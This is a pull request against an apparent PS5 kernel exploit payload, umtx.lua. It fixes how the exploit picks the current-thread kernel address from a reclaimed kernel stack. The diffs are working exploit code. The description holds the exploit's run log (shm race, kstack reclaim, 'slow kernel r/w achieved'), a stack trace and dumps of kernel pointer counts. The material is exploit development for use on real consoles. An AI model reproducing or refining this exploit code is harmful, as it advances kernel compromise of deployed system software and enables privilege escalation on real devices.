### PR TITLE
Fix get_kprim_curthr_from_kstack - not picking the address with the the highest counts.

### DIFF
--- a/payloads/umtx.lua
+++ b/payloads/umtx.lua
@@ -1099,7 +1099,7 @@ function get_kprim_curthr_from_kstack()
     local curthr_count, curthr_addr = 0
 
     for k, v in pairs(kernel_ptrs) do
-        if v > curthr_count and uint64(k) < uint64(0xffffffffffffffff) then
+        if v > curthr_count and uint64(k) < uint64("0xffffffffffffffff") then
             curthr_count = v
             curthr_addr = k
         end

--- a/payloads/umtx.lua
+++ b/payloads/umtx.lua
@@ -1095,19 +1095,23 @@ function get_kprim_curthr_from_kstack()
         end
     end
 
+    -- Find address with most occurance
+    local curthr_count, curthr_addr = 0
+
     local dict = {}
     for k, v in pairs(kernel_ptrs) do
+        if v > curthr_count and uint64(k) < uint64(0xffffffffffffffff) then
+            curthr_count = v
+            curthr_addr = k
+        end
         table.insert(dict, {key = k, val = v})
     end
 
-    -- sort by most occurences
-    table.sort(dict, function(a, b)
-        return a.val > b.val
-    end)
+    if curthr_count < 5 then
+        error("failed to find curthr_addr")
+    end
 
-    -- get kernel address in kstack with most occurences
-    local curthr_addr = uint64(select(2, next(dict)).key)
-    return curthr_addr
+    return uint64(curthr_addr)
 end
 
 

--- a/payloads/umtx.lua
+++ b/payloads/umtx.lua
@@ -1098,13 +1098,11 @@ function get_kprim_curthr_from_kstack()
     -- Find address with most occurance
     local curthr_count, curthr_addr = 0
 
-    local dict = {}
     for k, v in pairs(kernel_ptrs) do
         if v > curthr_count and uint64(k) < uint64(0xffffffffffffffff) then
             curthr_count = v
             curthr_addr = k
         end
-        table.insert(dict, {key = k, val = v})
     end
 
     if curthr_count < 5 then


### PR DESCRIPTION
@shahrilnet @n0llptr 

Changes:
  - Added a simple loop to get get the address with the largest counts/hits.
  - Safety check for address with low counts/hits, to prevent KP.

I found an issue on my 4.00 console with CUSA13303, the only game I have currently.
umtx exploit would always fail with:

```
umtx exploit

running on ps5 4.00
game @ NoraPrincess

exploit config:
max_attempt = 100
num_spray_fds = 40
num_kprim_threads = 384
max_race_attempt = 256

thread config:
lookup_thread = core 4 prio 400
destroyer_thread = core 1,2 prio 256
reclaim_thread = core -1 prio 450
main_thread = core 0 prio 256

== attempt #1 ==

race started
overlapped shm regions! winner_fd = 77
managed to reclaim kstack with mmap. kstack = 0x313430000
managed to modify kstack memory protection to r/w
failed to access kstack. retry
waiting all kprim threads to exit...

== attempt #2 ==

race started
overlapped shm regions! winner_fd = 66
managed to reclaim kstack with mmap. kstack = 0x3134b4000
managed to modify kstack memory protection to r/w
failed to access kstack. retry
waiting all kprim threads to exit...

== attempt #3 ==

race started
overlapped shm regions! winner_fd = 98
managed to reclaim kstack with mmap. kstack = 0x313568000
managed to modify kstack memory protection to r/w
kstack can be accessed successfully
successfully reclaimed kstack (kprim_id = 4)
waiting all kprim threads to exit (except the winner thread)...
kstack successfully reclaimed
slow kernel r/w achieved
[string "..."]:1109: attempt to index a nil value
stack traceback:
        [string "..."]:1109: in function 'get_kprim_curthr_from_kstack'
        [string "..."]:1159: in function 'get_initial_kernel_address'
        [string "..."]:1418: in function 'run_hax'
        [string "..."]:1487: in function 'main'
        [string "..."]:1490: in main chunk
        /savedata0/misc.lua:92: in function 'run_with_coroutine'
        /savedata0/main.lua:84: in function 'run_lua_code'
        /savedata0/main.lua:204: in function 'remote_lua_loader'
        /savedata0/main.lua:302: in function 'run_loader'
        /savedata0/main.lua:308: in function </savedata0/main.lua:247>
```

Before fix: This is wrong. It picked an address with a count of `1`, It failed to pick `  0xfffff7b76ad83400      19`

```
  0xffffff80aad476a0      1
  0xffffffff98c36815      1
  0xffffff80aad47c00      1
  0xffffffff9897a2a0      1
  0xfffff7b73820e700      4
  0xffffff80aad475f8      1
  0xfffff7b750503400      1
  0xffffffff9ba737a4      1
  0xffffffff98910c04      1
  0xffffff80aad47460      1
  0xffffffff9944c220      1
  0xffffffff98addd12      1
  0xffffff80aad47920      1
  0xffffffff98c5d392      1
  0xffffffff99687ec0      1
  0xffffffff9897b420      1
  0xffffff80aad477f0      1
  0xfffff7b75ffffde0      1
  0xffffffff98d3fc10      1
  0xffffff80aad47810      2
  0xffffffff9ba737cc      1
  0xffffffff991ce4c4      1
  0xffffff80aad47a40      2
  0xffffff80aad477d0      1
  0xffffff80aad473d0      1
  0xffffffff9bf70b40      2
  0xffffffff9bf70348      4
  0xffffffff98b9a0ab      2
  0xffffffff9890ed93      1
  0xffffff80aad47490      1
  0xffffffff9bf74bc8      2
  0xffffff80aad47400      1
  0xfffff7b73820eb20      2
  0xffffffff98d2ad4c      1
  0xffffffff98d3e9c5      2
  0xffffff80aad47540      2
  0xfffff7b77e901920      3
  0xffffffff9bf71bc8      1
  0xffffffff98c36f7f      1
  0xffffff80aad474d0      1
  0xffffffff9bf727e8      1
  0xffffff80aad476d0      1
  0xffffffff99058a04      3
  0xffffff80aad474b0      1
  0xffffffff9923443d      1
  0xffffff80aad47680      1
  0xffffffff9896eea8      1
  0xffffffff9f947318      2
  0xffffff80aad47800      2
  0xffffffff9f947300      1
  0xffffffff98909143      1
  0xffffff80aad47410      2
  0xffffff80aad47590      1
  0xfffff7b76ad83400      19
  0xffffffff992063fd      1
  0xffffff80aad47640      2
  0xffffffff98d3fcec      1
  0xffffff80aad475f0      1
  0xffffff80aad475e0      1
  0xffffff80aad475a0      1
  0xffffffff98d3fe6b      2
  0xffffffffffffffff      1
  0xffffffff98d3ed21      1
  0xffffff80aad478a8      1
  Largest key = 1
```

After fix: Correctly picks `0xffffeaf723c2e080` with a count/hits of `17`
```
0xffffffffc8316f7f      1
0xffffff809d0c34e0      1
0xffffeaf723c2e080      17
0xffffffffcb650348      4
0xffffff809d0c33d0      1
0xffffffffc840ad4c      1
0xffffffffcb6527e8      1
0xffffff809d0c3490      1
0xffffff809d0c33f0      1
0xffffffffcb651bc8      2
0xffffff809d0c3820      1
0xffffffffcf027318      2
0xffffffffc81bd992      1
0xffffffffc805b6f0      2
0xffffff809d0c36b0      1
0xffffeafb33e41920      2
0xffffffffc8b2c220      1
0xffffffffc805a2a0      1
0xffffff809d0c3a40      2
0xffffffffc88ae4c4      1
0xffffff809d0c3628      1
0xffffff80ffffffff      2
0xffffffffc7ff0c04      1
0xffffffffc841fe6b      2
0xffffff809d0c34c0      1
0xffffffffc7fe9143      1
0xffffff809d0c3c00      1
0xffffff809d0c37d0      1
0xffffff809d0c3960      1
0xffffffffc841e9c5      2
0xffffffffcb654bc8      3
0xffffff809d0c3570      2
0xffffff809d0c3920      2
0xffffff809d0c38d8      1
0xffffff809d0c36d0      1
0xffffffffcb650b40      2
0xffffffffc8d67ec0      1
0xffffff809d0c35d0      1
0xffffffffc827a0ab      2
0xffffffffc804eea8      1
0xffffff809d0c3500      1
0xffffffffc841ed21      2
0xffffffffcf027300      1
0xffffff809d0c3440      2
0xffffffffc841fcec      1
0xffffff809d0c35c0      1
0xffffff809d0c3610      1
0xffffeaf7782871a0      2
0xffffff809d0c3700      1
0xffffff809d0c3670      2
0xffffffffc7feed93      1
0xffffff809d0c3620      1
0xffffeaf778286d80      4
0xffffffffc8738a04      4
0xffffffffc891443d      1

Largest value:    17
Largest key:      0xffffeaf723c2e080
```

After the fix, it works most of the time on 4.00.